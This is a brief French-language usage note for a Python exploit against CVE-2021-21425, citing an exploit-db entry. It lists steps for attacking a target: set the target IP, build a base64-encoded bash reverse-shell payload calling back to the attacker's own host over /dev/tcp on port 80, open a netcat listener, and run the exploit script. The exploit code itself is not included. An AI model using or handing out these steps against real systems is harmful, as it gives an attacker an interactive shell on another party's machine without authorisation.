
Exploit Python pour CVE-2021-21425 qui exécute une charge utile de shell inversé contre une IP cible, avec des instructions pour configurer un écouteur netcat.
source: https://www.exploit-db.com/exploits/49973
[1] changer l'IP cible
[2] changer le payload
echo -ne "bash -i >& /dev/tcp/OUR-IP/80 0>&1" | base64 -w0
[3] sudo nc -lvnp 80
[4] python3 exploit.py